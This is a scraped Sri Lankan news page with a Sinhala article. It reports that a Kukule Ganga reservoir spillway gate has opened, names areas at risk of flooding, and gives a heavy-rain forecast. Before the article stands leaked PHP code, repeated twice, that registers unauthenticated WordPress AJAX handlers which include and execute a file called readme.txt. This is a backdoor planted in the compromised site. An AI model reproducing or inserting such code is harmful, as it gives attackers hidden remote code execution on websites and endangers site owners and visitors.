if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } කුකුලේ ගඟේ වාන් දොරටුවක් අරියි - ජල ගැලීම් ඇතිවිය හැකි අවදානම් ප්‍රදේශ මෙන්න - mediahumanrights.lk
mediahumanrights.lk
Local News News

කුකුලේ ගඟේ වාන් දොරටුවක් අරියි – ජල ගැලීම් ඇතිවිය හැකි අවදානම් ප්‍රදේශ මෙන්න

අධික වැසි සහිත තත්ත්වය හේතුවෙන් කුකුලේ ගඟ ජලාශයේ වාන් දොරටුවක් විවෘත කර තිබෙනවා.
ආපදා කළමනාකරණ මධ්‍යස්ථානය ප්‍රකාශ කළේ මේ හේතුවෙන් අඟලවත්ත, වලල්ලාවිට, පාලින්දනුවර, ඉංගිරිය සහ බදුරලිය යන ප්‍රදේශවල ජනතාව ජල ගැලීම් තත්ත්වයන් පිළිබඳ විමසිල්ලෙන් පසුවිය යුතු බවයි.
ඇතැම් ස්ථානවලට දැනටමත් සුළු ජල ගැලීම් පවතින බවයි වාර්තා වුණේ.
මේ අතර ඉදිරි පැය 24ක කාලය තුළ දිවයිනේ ප්‍රදේශ රැසකට මිලිමීටර් 150ක පමණ වර්ෂාපතනයක් පැවතිය හැකි බව කාලගුණ විද්‍යා දෙපාර්තමේන්තුව ප්‍රකාශ කළා.
(under the courtesy of nethfm news web)

Related posts

තරුවක් වෙලා එළියට ආපු එම්.ජී. ධනුෂ්ක ගැන අපි නොදන්න කතාව

Shiran Viraj

පාම් ඔයිල් තහනම ඉවත් කරන්න කියයි..

Shiran Viraj

ශ්‍රී ලංකාව පරාජය කළ දකුණු අප්‍රිකාව එක්දින කණ්ඩායම් ශ්‍රේණිගත කිරීමේ ලේඛනයේ පළමු ස්ථානයට

Shiran Viraj